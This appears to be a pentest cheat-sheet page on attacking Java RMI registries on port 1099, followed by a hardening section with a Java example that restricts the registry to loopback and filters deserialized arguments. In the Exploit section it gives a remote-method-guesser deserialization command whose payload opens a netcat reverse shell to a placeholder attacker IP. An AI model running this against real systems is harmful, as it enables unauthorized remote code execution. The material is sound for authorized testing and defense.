Java RMI
aka rmi, rmiregistry
Java Remote Method Invocation registry on 1099 (and random high ports). Enumerate bound objects, then exploit insecure remote methods or deserialization for RCE — remote-method-guesser is the modern Swiss-army tool.
Ports
| Port | Proto | Notes |
|---|---|---|
| 1099 | tcp | RMI registry |
| 1098 | tcp | RMI activation |
Fingerprint
- nmap rmi-dumpregistry lists bound objects
- remote-method-guesser (rmg) enum returns registry + objects
Exploitation primitives
- Enumerate bound objects and their interfaces (rmg enum / nmap rmi-dumpregistry)
- Call dangerous remote methods directly; guess method signatures with rmg guess
- Deserialization RCE via the registry or a vulnerable remote method (ysoserial gadget)
Overview
Java RMI on 1099 lets clients call methods on remote Java objects. Insecure endpoints expose dangerous methods or accept arbitrary serialized objects — both lead to RCE.
Enumeration
Dump the registry (bound objects):
nmap -p1099 --script rmi-dumpregistry <TARGET>
Full enum with remote-method-guesser:
rmg enum <TARGET> 1099
Exploit
Guess remote method signatures:
rmg guess <TARGET> 1099
Deserialization RCE against the registry (ysoserial gadget):
rmg serial <TARGET> 1099 CommonsCollections6 "nc <YOUR_IP> 4444 -e /bin/bash" --component reg
Hardening
Enable a security manager + deserialization filters, require TLS/auth, and don’t expose the registry to untrusted networks.
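The filter and exposure points above, sketched for JDK 9 or later as an added example (not code from the original page or from any tool it names). The `Inbox` interface, the `inbox` binding name and the filter limits are hypothetical; the registry and the exported object listen on loopback only, and call arguments pass through an allow-list filter.

```java
import java.io.ObjectInputFilter;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.UnicastRemoteObject;
import java.util.HashMap;

public class HardenedRmiDemo {
    // Hypothetical interface: an Object parameter makes the method a deserialization sink.
    public interface Inbox extends Remote {
        String submit(Object msg) throws RemoteException;
    }

    static class InboxImpl implements Inbox {
        public String submit(Object msg) { return "accepted " + msg.getClass().getName(); }
    }

    public static void main(String[] args) throws Exception {
        // Stubs must advertise the same address the listeners are bound to.
        System.setProperty("java.rmi.server.hostname", "127.0.0.1");
        InetAddress lo = InetAddress.getLoopbackAddress();
        // Registry and object listeners bind to loopback only, not all interfaces.
        RMIServerSocketFactory ssf = port -> new ServerSocket(port, 50, lo);
        // Allow-list for call arguments: Strings only, bounded graph, reject the rest.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "maxdepth=5;maxrefs=100;maxbytes=65536;java.lang.String;!*");

        Inbox impl = new InboxImpl();
        Inbox stub = (Inbox) UnicastRemoteObject.exportObject(impl, 0, null, ssf, filter);
        Registry reg = LocateRegistry.createRegistry(1099, null, ssf);
        reg.rebind("inbox", stub);

        Inbox remote = (Inbox) LocateRegistry.getRegistry("127.0.0.1", 1099).lookup("inbox");
        System.out.println(remote.submit("hello"));          // String passes the filter
        try {
            remote.submit(new HashMap<String, String>());     // not on the allow-list
        } catch (RemoteException e) {
            Throwable root = e;
            while (root.getCause() != null) root = root.getCause();
            System.out.println("rejected: " + root);
        }
        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(reg, true);
    }
}
```

To require TLS, pass `javax.rmi.ssl.SslRMIClientSocketFactory` and `javax.rmi.ssl.SslRMIServerSocketFactory` (with a configured keystore) in place of the plain factories. The Security Manager is deprecated for removal as of JDK 17 (JEP 411), so on current JDKs the filter and the bind address do most of the work.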